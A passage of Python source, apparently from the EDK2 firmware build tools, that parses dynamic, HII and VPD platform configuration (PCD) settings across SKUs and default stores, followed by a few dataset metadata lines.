c_line, dsc_line = error_line.split(r"//")
else:
dsc_line = error_line
message_itmes = Message.split(":")
Index = 0
if "PcdValueInit.c" not in Message:
if not MessageGroup:
MessageGroup.append(Message)
break
else:
for item in message_itmes:
if "PcdValueInit.c" in item:
Index = message_itmes.index(item)
message_itmes[Index] = dsc_line.strip()
break
MessageGroup.append(":".join(message_itmes[Index:]).strip())
continue
else:
MessageGroup.append(Message)
if MessageGroup:
EdkLogger.error("build", PCD_STRUCTURE_PCD_ERROR, "\n".join(MessageGroup) )
else:
EdkLogger.error('Build', COMMAND_FAILURE, 'Can not execute command: %s' % MakeCommand)
if DscBuildData.NeedUpdateOutput(OutputValueFile, Dest_PcdValueInitExe, InputValueFile):
Command = Dest_PcdValueInitExe + ' -i %s -o %s' % (InputValueFile, OutputValueFile)
returncode, StdOut, StdErr = DscBuildData.ExecuteCommand (Command)
if returncode != 0:
EdkLogger.warn('Build', COMMAND_FAILURE, 'Can not collect output from command: %s' % Command)
File = open (OutputValueFile, 'r')
FileBuffer = File.readlines()
File.close()
StructurePcdSet = []
for Pcd in FileBuffer:
PcdValue = Pcd.split ('|')
PcdInfo = PcdValue[0].split ('.')
StructurePcdSet.append((PcdInfo[0], PcdInfo[1], PcdInfo[2], PcdInfo[3], PcdValue[2].strip()))
return StructurePcdSet
@staticmethod
def NeedUpdateOutput(OutputFile, ValueCFile, StructureInput):
if not os.path.exists(OutputFile):
return True
if os.stat(OutputFile).st_mtime <= os.stat(ValueCFile).st_mtime:
return True
if os.stat(OutputFile).st_mtime <= os.stat(StructureInput).st_mtime:
return True
return False
## Retrieve dynamic PCD settings
#
# @param Type PCD type
#
# @retval a dict object contains settings of given PCD type
#
def _GetDynamicPcd(self, Type):
Pcds = OrderedDict()
#
# tdict is a special dict kind of type, used for selecting correct
# PCD settings for certain ARCH and SKU
#
PcdDict = tdict(True, 4)
PcdList = []
# Find out all possible PCD candidates for self._Arch
RecordList = self._RawData[Type, self._Arch]
AvailableSkuIdSet = copy.copy(self.SkuIds)
for TokenSpaceGuid, PcdCName, Setting, Arch, SkuName, Dummy3, Dummy4, Dummy5 in RecordList:
SkuName = SkuName.upper()
SkuName = TAB_DEFAULT if SkuName == TAB_COMMON else SkuName
if SkuName not in AvailableSkuIdSet:
EdkLogger.error('build', PARAMETER_INVALID, 'Sku %s is not defined in [SkuIds] section' % SkuName,
File=self.MetaFile, Line=Dummy5)
if "." not in TokenSpaceGuid and "[" not in PcdCName and (PcdCName, TokenSpaceGuid, SkuName, Dummy5) not in PcdList:
PcdList.append((PcdCName, TokenSpaceGuid, SkuName, Dummy5))
PcdDict[Arch, SkuName, PcdCName, TokenSpaceGuid] = Setting
# Remove redundant PCD candidates, per the ARCH and SKU
for PcdCName, TokenSpaceGuid, SkuName, Dummy4 in PcdList:
Setting = PcdDict[self._Arch, SkuName, PcdCName, TokenSpaceGuid]
if Setting is None:
continue
PcdValue, DatumType, MaxDatumSize = self._ValidatePcd(PcdCName, TokenSpaceGuid, Setting, Type, Dummy4)
if MaxDatumSize:
if int(MaxDatumSize, 0) > 0xFFFF:
EdkLogger.error('build', FORMAT_INVALID, "The size value must not exceed the maximum value of 0xFFFF (UINT16) for %s." % ".".join((TokenSpaceGuid, PcdCName)),
File=self.MetaFile, Line=Dummy4)
if int(MaxDatumSize, 0) < 0:
EdkLogger.error('build', FORMAT_INVALID, "The size value can't be set to negative value for %s." % ".".join((TokenSpaceGuid, PcdCName)),
File=self.MetaFile, Line=Dummy4)
SkuInfo = SkuInfoClass(SkuName, self.SkuIds[SkuName][0], '', '', '', '', '', PcdValue)
if (PcdCName, TokenSpaceGuid) in Pcds:
pcdObject = Pcds[PcdCName, TokenSpaceGuid]
pcdObject.SkuInfoList[SkuName] = SkuInfo
if MaxDatumSize.strip():
CurrentMaxSize = int(MaxDatumSize.strip(), 0)
else:
CurrentMaxSize = 0
if pcdObject.MaxDatumSize:
PcdMaxSize = int(pcdObject.MaxDatumSize, 0)
else:
PcdMaxSize = 0
if CurrentMaxSize > PcdMaxSize:
pcdObject.MaxDatumSize = str(CurrentMaxSize)
else:
Pcds[PcdCName, TokenSpaceGuid] = PcdClassObject(
PcdCName,
TokenSpaceGuid,
self._PCD_TYPE_STRING_[Type],
DatumType,
PcdValue,
'',
MaxDatumSize,
OrderedDict({SkuName : SkuInfo}),
False,
None,
IsDsc=True)
if SkuName not in Pcds[PcdCName, TokenSpaceGuid].DscRawValue:
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName][TAB_DEFAULT_STORES_DEFAULT] = PcdValue
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName][TAB_DEFAULT_STORES_DEFAULT] = (self.MetaFile.File,Dummy4)
for pcd in Pcds.values():
pcdDecObject = self._DecPcds[pcd.TokenCName, pcd.TokenSpaceGuidCName]
# Only fix the value while no value provided in DSC file.
for sku in pcd.SkuInfoList.values():
if not sku.DefaultValue:
sku.DefaultValue = pcdDecObject.DefaultValue
if TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON not in pcd.SkuInfoList:
valuefromDec = pcdDecObject.DefaultValue
SkuInfo = SkuInfoClass(TAB_DEFAULT, '0', '', '', '', '', '', valuefromDec)
pcd.SkuInfoList[TAB_DEFAULT] = SkuInfo
elif TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
pcd.SkuInfoList[TAB_DEFAULT] = pcd.SkuInfoList[TAB_COMMON]
del pcd.SkuInfoList[TAB_COMMON]
elif TAB_DEFAULT in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
del pcd.SkuInfoList[TAB_COMMON]
list(map(self.FilterSkuSettings, Pcds.values()))
return Pcds
def FilterSkuSettings(self, PcdObj):
if self.SkuIdMgr.SkuUsageType == self.SkuIdMgr.SINGLE:
if TAB_DEFAULT in PcdObj.SkuInfoList and self.SkuIdMgr.SystemSkuId not in PcdObj.SkuInfoList:
PcdObj.SkuInfoList[self.SkuIdMgr.SystemSkuId] = PcdObj.SkuInfoList[TAB_DEFAULT]
PcdObj.SkuInfoList = {TAB_DEFAULT:PcdObj.SkuInfoList[self.SkuIdMgr.SystemSkuId]}
PcdObj.SkuInfoList[TAB_DEFAULT].SkuIdName = TAB_DEFAULT
PcdObj.SkuInfoList[TAB_DEFAULT].SkuId = '0'
elif self.SkuIdMgr.SkuUsageType == self.SkuIdMgr.DEFAULT:
PcdObj.SkuInfoList = {TAB_DEFAULT:PcdObj.SkuInfoList[TAB_DEFAULT]}
return PcdObj
@staticmethod
def CompareVarAttr(Attr1, Attr2):
if not Attr1 or not Attr2: # for empty string
return True
Attr1s = [attr.strip() for attr in Attr1.split(",")]
Attr1Set = set(Attr1s)
Attr2s = [attr.strip() for attr in Attr2.split(",")]
Attr2Set = set(Attr2s)
if Attr2Set == Attr1Set:
return True
else:
return False
def CompletePcdValues(self, PcdSet):
Pcds = OrderedDict()
DefaultStoreObj = DefaultStore(self._GetDefaultStores())
SkuIds = {skuname:skuid for skuname, skuid in self.SkuIdMgr.AvailableSkuIdSet.items() if skuname != TAB_COMMON}
DefaultStores = set(storename for pcdobj in PcdSet.values() for skuobj in pcdobj.SkuInfoList.values() for storename in skuobj.DefaultStoreDict)
for PcdCName, TokenSpaceGuid in PcdSet:
PcdObj = PcdSet[(PcdCName, TokenSpaceGuid)]
if PcdObj.Type not in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_DEFAULT],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_VPD],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_DEFAULT],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_VPD]]:
Pcds[PcdCName, TokenSpaceGuid]= PcdObj
continue
PcdType = PcdObj.Type
if PcdType in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
for skuid in PcdObj.SkuInfoList:
skuobj = PcdObj.SkuInfoList[skuid]
mindefaultstorename = DefaultStoreObj.GetMin(set(defaultstorename for defaultstorename in skuobj.DefaultStoreDict))
for defaultstorename in DefaultStores:
if defaultstorename not in skuobj.DefaultStoreDict:
skuobj.DefaultStoreDict[defaultstorename] = skuobj.DefaultStoreDict[mindefaultstorename]
skuobj.HiiDefaultValue = skuobj.DefaultStoreDict[mindefaultstorename]
for skuname, skuid in SkuIds.items():
if skuname not in PcdObj.SkuInfoList:
nextskuid = self.SkuIdMgr.GetNextSkuId(skuname)
while nextskuid not in PcdObj.SkuInfoList:
nextskuid = self.SkuIdMgr.GetNextSkuId(nextskuid)
PcdObj.SkuInfoList[skuname] = copy.deepcopy(PcdObj.SkuInfoList[nextskuid])
PcdObj.SkuInfoList[skuname].SkuId = skuid
PcdObj.SkuInfoList[skuname].SkuIdName = skuname
if PcdType in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
PcdObj.DefaultValue = list(PcdObj.SkuInfoList.values())[0].HiiDefaultValue if self.SkuIdMgr.SkuUsageType == self.SkuIdMgr.SINGLE else PcdObj.SkuInfoList[TAB_DEFAULT].HiiDefaultValue
Pcds[PcdCName, TokenSpaceGuid]= PcdObj
return Pcds
## Retrieve dynamic HII PCD settings
#
# @param Type PCD type
#
# @retval a dict object contains settings of given PCD type
#
def _GetDynamicHiiPcd(self, Type):
VariableAttrs = {}
Pcds = OrderedDict()
UserDefinedDefaultStores = []
#
# tdict is a special dict kind of type, used for selecting correct
# PCD settings for certain ARCH and SKU
#
PcdDict = tdict(True, 5)
PcdList = []
RecordList = self._RawData[Type, self._Arch]
# Find out all possible PCD candidates for self._Arch
AvailableSkuIdSet = copy.copy(self.SkuIds)
DefaultStoresDefine = self._GetDefaultStores()
for TokenSpaceGuid, PcdCName, Setting, Arch, SkuName, DefaultStore, Dummy4, Dummy5 in RecordList:
SkuName = SkuName.upper()
SkuName = TAB_DEFAULT if SkuName == TAB_COMMON else SkuName
DefaultStore = DefaultStore.upper()
if DefaultStore == TAB_COMMON:
DefaultStore = TAB_DEFAULT_STORES_DEFAULT
else:
#The end user define [DefaultStores] and [SKUID_IDENTIFIER.Menufacturing] in DSC
UserDefinedDefaultStores.append((PcdCName, TokenSpaceGuid))
if SkuName not in AvailableSkuIdSet:
EdkLogger.error('build', PARAMETER_INVALID, 'Sku %s is not defined in [SkuIds] section' % SkuName,
File=self.MetaFile, Line=Dummy5)
if DefaultStore not in DefaultStoresDefine:
EdkLogger.error('build', PARAMETER_INVALID, 'DefaultStores %s is not defined in [DefaultStores] section' % DefaultStore,
File=self.MetaFile, Line=Dummy5)
if "." not in TokenSpaceGuid and "[" not in PcdCName and (PcdCName, TokenSpaceGuid, SkuName, DefaultStore, Dummy5) not in PcdList:
PcdList.append((PcdCName, TokenSpaceGuid, SkuName, DefaultStore, Dummy5))
PcdDict[Arch, SkuName, PcdCName, TokenSpaceGuid, DefaultStore] = Setting
# Remove redundant PCD candidates, per the ARCH and SKU
for index,(PcdCName, TokenSpaceGuid, SkuName, DefaultStore, Dummy4) in enumerate(PcdList):
Setting = PcdDict[self._Arch, SkuName, PcdCName, TokenSpaceGuid, DefaultStore]
if Setting is None:
continue
VariableName, VariableGuid, VariableOffset, DefaultValue, VarAttribute = self._ValidatePcd(PcdCName, TokenSpaceGuid, Setting, Type, Dummy4)
rt, Msg = VariableAttributes.ValidateVarAttributes(VarAttribute)
if not rt:
EdkLogger.error("build", PCD_VARIABLE_ATTRIBUTES_ERROR, "Variable attributes settings for %s is incorrect.\n %s" % (".".join((TokenSpaceGuid, PcdCName)), Msg),
ExtraData="[%s]" % VarAttribute)
ExceedMax = False
FormatCorrect = True
if VariableOffset.isdigit():
if int(VariableOffset, 10) > 0xFFFF:
ExceedMax = True
elif variablePattern.match(VariableOffset):
if int(VariableOffset, 16) > 0xFFFF:
ExceedMax = True
# For Offset written in "A.B"
elif VariableOffset.find('.') > -1:
VariableOffsetList = VariableOffset.split(".")
if not (len(VariableOffsetList) == 2
and IsValidWord(VariableOffsetList[0])
and IsValidWord(VariableOffsetList[1])):
FormatCorrect = False
else:
FormatCorrect = False
if not FormatCorrect:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid syntax or format of the variable offset value is incorrect for %s." % ".".join((TokenSpaceGuid, PcdCName)))
if ExceedMax:
EdkLogger.error('Build', OPTION_VALUE_INVALID, "The variable offset value must not exceed the maximum value of 0xFFFF (UINT16) for %s." % ".".join((TokenSpaceGuid, PcdCName)))
if (VariableName, VariableGuid) not in VariableAttrs:
VariableAttrs[(VariableName, VariableGuid)] = VarAttribute
else:
if not DscBuildData.CompareVarAttr(VariableAttrs[(VariableName, VariableGuid)], VarAttribute):
EdkLogger.error('Build', PCD_VARIABLE_ATTRIBUTES_CONFLICT_ERROR, "The variable %s.%s for DynamicHii PCDs has conflicting attributes [%s] and [%s] " % (VariableGuid, VariableName, VarAttribute, VariableAttrs[(VariableName, VariableGuid)]))
pcdDecObject = self._DecPcds[PcdCName, TokenSpaceGuid]
if (PcdCName, TokenSpaceGuid) in Pcds:
pcdObject = Pcds[PcdCName, TokenSpaceGuid]
if SkuName in pcdObject.SkuInfoList:
Skuitem = pcdObject.SkuInfoList[SkuName]
Skuitem.DefaultStoreDict.update({DefaultStore:DefaultValue})
else:
SkuInfo = SkuInfoClass(SkuName, self.SkuIds[SkuName][0], VariableName, VariableGuid, VariableOffset, DefaultValue, VariableAttribute=VarAttribute, DefaultStore={DefaultStore:DefaultValue})
pcdObject.SkuInfoList[SkuName] = SkuInfo
else:
SkuInfo = SkuInfoClass(SkuName, self.SkuIds[SkuName][0], VariableName, VariableGuid, VariableOffset, DefaultValue, VariableAttribute=VarAttribute, DefaultStore={DefaultStore:DefaultValue})
PcdClassObj = PcdClassObject(
PcdCName,
TokenSpaceGuid,
self._PCD_TYPE_STRING_[Type],
'',
DefaultValue,
'',
'',
OrderedDict({SkuName : SkuInfo}),
False,
None,
pcdDecObject.validateranges,
pcdDecObject.validlists,
pcdDecObject.expressions,
IsDsc=True)
if (PcdCName, TokenSpaceGuid) in UserDefinedDefaultStores:
PcdClassObj.UserDefinedDefaultStoresFlag = True
Pcds[PcdCName, TokenSpaceGuid] = PcdClassObj
Pcds[PcdCName, TokenSpaceGuid].CustomAttribute['DscPosition'] = index
if SkuName not in Pcds[PcdCName, TokenSpaceGuid].DscRawValue:
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName][DefaultStore] = DefaultValue
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName][DefaultStore] = (self.MetaFile.File,Dummy4)
for pcd in Pcds.values():
pcdDecObject = self._DecPcds[pcd.TokenCName, pcd.TokenSpaceGuidCName]
pcd.DatumType = pcdDecObject.DatumType
# Only fix the value while no value provided in DSC file.
for sku in pcd.SkuInfoList.values():
if (sku.HiiDefaultValue == "" or sku.HiiDefaultValue is None):
sku.HiiDefaultValue = pcdDecObject.DefaultValue
for default_store in sku.DefaultStoreDict:
sku.DefaultStoreDict[default_store]=pcdDecObject.DefaultValue
pcd.DefaultValue = pcdDecObject.DefaultValue
if TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON not in pcd.SkuInfoList:
SkuInfoObj = list(pcd.SkuInfoList.values())[0]
valuefromDec = pcdDecObject.DefaultValue
SkuInfo = SkuInfoClass(TAB_DEFAULT, '0', SkuInfoObj.VariableName, SkuInfoObj.VariableGuid, SkuInfoObj.VariableOffset, valuefromDec, VariableAttribute=SkuInfoObj.VariableAttribute, DefaultStore={DefaultStore:valuefromDec})
pcd.SkuInfoList[TAB_DEFAULT] = SkuInfo
elif TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
pcd.SkuInfoList[TAB_DEFAULT] = pcd.SkuInfoList[TAB_COMMON]
del pcd.SkuInfoList[TAB_COMMON]
elif TAB_DEFAULT in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
del pcd.SkuInfoList[TAB_COMMON]
if pcd.MaxDatumSize.strip():
MaxSize = int(pcd.MaxDatumSize, 0)
else:
MaxSize = 0
if pcd.DatumType not in TAB_PCD_NUMERIC_TYPES:
for (_, skuobj) in pcd.SkuInfoList.items():
datalen = 0
skuobj.HiiDefaultValue = StringToArray(skuobj.HiiDefaultValue)
datalen = len(skuobj.HiiDefaultValue.split(","))
if datalen > MaxSize:
MaxSize = datalen
for defaultst in skuobj.DefaultStoreDict:
skuobj.DefaultStoreDict[defaultst] = StringToArray(skuobj.DefaultStoreDict[defaultst])
pcd.DefaultValue = StringToArray(pcd.DefaultValue)
pcd.MaxDatumSize = str(MaxSize)
rt, invalidhii = DscBuildData.CheckVariableNameAssignment(Pcds)
if not rt:
invalidpcd = ",".join(invalidhii)
EdkLogger.error('build', PCD_VARIABLE_INFO_ERROR, Message='The same HII PCD must map to the same EFI variable for all SKUs', File=self.MetaFile, ExtraData=invalidpcd)
list(map(self.FilterSkuSettings, Pcds.values()))
return Pcds
@staticmethod
def CheckVariableNameAssignment(Pcds):
invalidhii = []
for pcdname in Pcds:
pcd = Pcds[pcdname]
varnameset = set(sku.VariableName for (skuid, sku) in pcd.SkuInfoList.items())
if len(varnameset) > 1:
invalidhii.append(".".join((pcdname[1], pcdname[0])))
if len(invalidhii):
return False, invalidhii
else:
return True, []
## Retrieve dynamic VPD PCD settings
#
# @param Type PCD type
#
# @retval a dict object contains settings of given PCD type
#
def _GetDynamicVpdPcd(self, Type):
Pcds = OrderedDict()
#
# tdict is a special dict kind of type, used for selecting correct
# PCD settings for certain ARCH and SKU
#
PcdDict = tdict(True, 4)
PcdList = []
# Find out all possible PCD candidates for self._Arch
RecordList = self._RawData[Type, self._Arch]
AvailableSkuIdSet = copy.copy(self.SkuIds)
for TokenSpaceGuid, PcdCName, Setting, Arch, SkuName, Dummy3, Dummy4, Dummy5 in RecordList:
SkuName = SkuName.upper()
SkuName = TAB_DEFAULT if SkuName == TAB_COMMON else SkuName
if SkuName not in AvailableSkuIdSet:
EdkLogger.error('build', PARAMETER_INVALID, 'Sku %s is not defined in [SkuIds] section' % SkuName,
File=self.MetaFile, Line=Dummy5)
if "." not in TokenSpaceGuid and "[" not in PcdCName and (PcdCName, TokenSpaceGuid, SkuName, Dummy5) not in PcdList:
PcdList.append((PcdCName, TokenSpaceGuid, SkuName, Dummy5))
PcdDict[Arch, SkuName, PcdCName, TokenSpaceGuid] = Setting
# Remove redundant PCD candidates, per the ARCH and SKU
for PcdCName, TokenSpaceGuid, SkuName, Dummy4 in PcdList:
Setting = PcdDict[self._Arch, SkuName, PcdCName, TokenSpaceGuid]
if Setting is None:
continue
#
# For the VOID* type, it can have optional data of MaxDatumSize and InitialValue
# For the Integer & Boolean type, the optional data can only be InitialValue.
# At this point, we put all the data into the PcdClssObject for we don't know the PCD's datumtype
# until the DEC parser has been called.
#
VpdOffset, MaxDatumSize, InitialValue = self._ValidatePcd(PcdCName, TokenSpaceGuid, Setting, Type, Dummy4)
if MaxDatumSize:
if int(MaxDatumSize, 0) > 0xFFFF:
EdkLogger.error('build', FORMAT_INVALID, "The size value must not exceed the maximum value of 0xFFFF (UINT16) for %s." % ".".join((TokenSpaceGuid, PcdCName)),
File=self.MetaFile, Line=Dummy4)
if int(MaxDatumSize, 0) < 0:
EdkLogger.error('build', FORMAT_INVALID, "The size value can't be set to negative value for %s." % ".".join((TokenSpaceGuid, PcdCName)),
File=self.MetaFile, Line=Dummy4)
SkuInfo = SkuInfoClass(SkuName, self.SkuIds[SkuName][0], '', '', '', '', VpdOffset, InitialValue)
if (PcdCName, TokenSpaceGuid) in Pcds:
pcdObject = Pcds[PcdCName, TokenSpaceGuid]
pcdObject.SkuInfoList[SkuName] = SkuInfo
if MaxDatumSize.strip():
CurrentMaxSize = int(MaxDatumSize.strip(), 0)
else:
CurrentMaxSize = 0
if pcdObject.MaxDatumSize:
PcdMaxSize = int(pcdObject.MaxDatumSize, 0)
else:
PcdMaxSize = 0
if CurrentMaxSize > PcdMaxSize:
pcdObject.MaxDatumSize = str(CurrentMaxSize)
else:
Pcds[PcdCName, TokenSpaceGuid] = PcdClassObject(
PcdCName,
TokenSpaceGuid,
self._PCD_TYPE_STRING_[Type],
'',
InitialValue,
'',
MaxDatumSize,
OrderedDict({SkuName : SkuInfo}),
False,
None,
IsDsc=True)
if SkuName not in Pcds[PcdCName, TokenSpaceGuid].DscRawValue:
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName][TAB_DEFAULT_STORES_DEFAULT] = InitialValue
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName][TAB_DEFAULT_STORES_DEFAULT] = (self.MetaFile.File,Dummy4)
for pcd in Pcds.values():
pcdDecObject = self._DecPcds[pcd.TokenCName, pcd.TokenSpaceGuidCName]
pcd.DatumType = pcdDecObject.DatumType
# Only fix the value while no value provided in DSC file.
for sku in pcd.SkuInfoList.values():
if not sku.DefaultValue:
sku.DefaultValue = pcdDecObject.DefaultValue
if TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON not in pcd.SkuInfoList:
SkuInfoObj = list(pcd.SkuInfoList.values())[0]
valuefromDec = pcdDecObject.DefaultValue
SkuInfo = SkuInfoClass(TAB_DEFAULT, '0', '', '', '', '', SkuInfoObj.VpdOffset, valuefromDec)
pcd.SkuInfoList[TAB_DEFAULT] = SkuInfo
elif TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
pcd.SkuInfoList[TAB_DEFAULT] = pcd.SkuInfoList[TAB_COMMON]
del pcd.SkuInfoList[TAB_COMMON]
elif TAB_DEFAULT in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
del pcd.SkuInfoList[TAB_COMMON]
#For the same one VOID* pcd, if the default value type of one SKU is "Unicode string",
#the other SKUs are "OtherVOID*"(ASCII string or byte array),Then convert "Unicode string" to "byte array".
for pcd in Pcds.values():
PcdValueTypeSet = set()
for sku in pcd.SkuInfoList.values():
PcdValueTypeSet.add("UnicodeString" if sku.DefaultValue.startswith(('L"',"L'")) else "OtherVOID*")
if len(PcdValueTypeSet) > 1:
for sku in pcd.SkuInfoList.values():
sku.DefaultValue = StringToArray(sku.DefaultValue) if sku.DefaultValue.startswith(('L"',"L'")) else sku.DefaultValue
list(map(self.FilterSkuSettings, Pcds.values()))
return Pcds
## Add external modules
#
# The external modules are mostly those listed in FDF file, which don't
# need "build".
#
# @param FilePath The path of module description file
#
def AddModule(self, FilePath):
FilePath = NormPath(FilePath)
if FilePath not in self.Modules:
Module = ModuleBuildClassObject()
Module.MetaFile = FilePath
self.Modules.append(Module)
@property
def ToolChainFamily(self):
self._ToolChainFamily = TAB_COMPILER_MSFT
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, "target.txt"))
if os.path.isfile(BuildConfigurationFile) == True:
ToolDefinitionFile = TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = "tools_def.txt"
ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
ToolDefinition = ToolDef.ToolsDefTxtDatabase
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition \
or self._Toolchain not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][self._Toolchain]:
self._ToolChainFamily = TAB_COMPILER_MSFT
else:
self._ToolChainFamily = ToolDefinition[TAB_TOD_DEFINES_FAMILY][self._Toolchain]
return self._ToolChainFamily
## Add external PCDs
#
# The external PCDs are mostly those listed in FDF file to specify address
# or offset information.
#
# @param Name Name of the PCD
# @param Guid Token space guid of the PCD
# @param Value Value of the PCD
#
def AddPcd(self, Name, Guid, Value):
if (Name, Guid) not in self.Pcds:
self.Pcds[Name, Guid] = PcdClassObject(Name, Guid, '', '', '', '', '', {}, False, None)
self.Pcds[Name, Guid].DefaultValue = Value
@property
def DecPcds(self):
if self._DecPcds is None:
FdfInfList = []
if GlobalData.gFdfParser:
FdfInfList = GlobalData.gFdfParser.Profile.InfList
PkgSet = set()
for Inf in FdfInfList:
ModuleFile = PathClass(NormPath(Inf), GlobalData.gWorkspace, Arch=self._Arch)
if ModuleFile in self._Modules:
continue
ModuleData = self._Bdb[ModuleFile, self._Arch, self._Target, self._Toolchain]
PkgSet.update(ModuleData.Packages)
if self.Packages:
PkgSet.update(self.Packages)
self._DecPcds, self._GuidDict = GetDeclaredPcd(self, self._Bdb, self._Arch, self._Target, self._Toolchain, PkgSet)
self._GuidDict.update(GlobalData.gPlatformPcds)
return self._DecPcds
|
[] |
[] |
[
"WORKSPACE"
] |
[]
|
["WORKSPACE"]
|
python
| 1 | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.